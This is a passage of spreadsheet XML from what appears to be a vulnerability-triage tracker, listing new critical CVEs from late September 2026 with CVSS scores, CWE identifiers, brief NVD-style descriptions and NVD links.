      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in Booking Activities &lt;= 1.18.7.1 versions.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97248</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97274</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Bypass Vulnerability in OAuth Single Sign On – SSO (OAuth Client) &lt;= 7.1.2 versions.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97274</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102149</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway did not sufficiently restrict which account a certificate could be assigned to. This could allow an attacker to associate a certificate with another user's account, affecting the confidentiality and integrity of that account's encrypted mail and, where certificate-based login is enabled, potentially permitting unauthorized access to the account.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102149</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102489</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>csirt@divd.nl</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr"/>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Zammad versions 6.3.0 to 6.5.4 are vulnerable a session hijack vulnerability that leads to remote code execution as the zammad user. The vulnerability is also present in version 7.0.0 to version 7.1.3, but not exploitable due to environment conditions.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102489</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102490</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>csirt@divd.nl</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr"/>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>All versions of Zammad including the latest alpha enable the local zammad user to escalate privileges to root.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102490</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14157</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Use of an Externally Controlled Format String in the ASUS Router modules allow a remote authenticated user to execute arbitrary commands via a crafted file uploaded through the web management interface.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14157</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55181</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>docker, gin</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.3, Tugtainer's OIDC authentication can still be initiated even when OIDC_ENABLED=false. The /auth/oidc/enabled endpoint correctly reports that OIDC is disabled. However, a direct request to /auth/oidc/login still starts the OIDC login flow, returns HTTP 302, sets an oidc_state cookie, and redirects the user to the configured OIDC authorization endpoint. This bypasses the intended OIDC disable switch. This issue has been patched in version 1.30.3.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55181</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93903</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-174</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>LiteSpeed Web Server (LSWS) before 6.3.7 build 1 mishandles internal redirect URL validation in a certain "corner case."</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93903</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102147</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) weakness in Kiteworks Core could allow an unauthenticated attacker to store crafted content that later executes arbitrary JavaScript in the authenticated session of an administrator who views the affected page. This could have permitted the attacker to gain full administrative control, including the creation of a new administrative account.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102147</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102455</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has a Insecure Deserialization vulnerability. Unauthenticated remote attackers can execute arbitrary code on the server by sending maliciously crafted serialized content.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102455</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102458</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has a Missing Authentication vulnerability. Unauthenticated remote attackers can obtain other users' plaintext passwords through a specific API.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102458</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103395</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 visual_only deployments expose an unauthenticated RPyC service with allow_pickle enabled that deserializes attacker-supplied arguments in the remote_infer_images method. Attackers can reach the visual RPyC port and pass objects with __reduce__ methods to execute arbitrary code with service account privileges.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103395</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103470</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>In Internet2 Grouper before 7.5.1 (in some configurations), a user who is allowed to create or edit rules in the User Interface can escalate privileges.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103470</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103475</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>yii2-starter-kit through 4.2.0 exposes the Yii debug and Gii modules to all IP addresses by setting allowedIPs to ['*'] in its default development configuration. Unauthenticated remote attackers can access the debug endpoint to read sensitive data including session cookies and database queries, or access the Gii endpoint to generate and write PHP files into the application directory.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103475</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74864</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>nginx, go, gin</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>sogo_yhn configures SOGo with a parameter that forces the request with HTTP header "x-webobjects-remote-user" to be treated as sent by a verified user without performing password validation. Since Nginx does not strip this header, any client can supply it arbitrarily and gain access as any user, including a privileged user, without providing a password.
This issue was fixed in version 5.8.0~ynh9.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74864</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76142</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-306</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Insufficient authentication and access control on the internal-only IPC SOAP endpoint of the Genian NAC/ZTNA policy server allows an unauthenticated attacker to invoke internal functions</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76142</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82824</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Path Traversal vulnerability that allows an attacker to access, create, modify, or delete files.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82824</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82825</t>
        </is>
      </c>
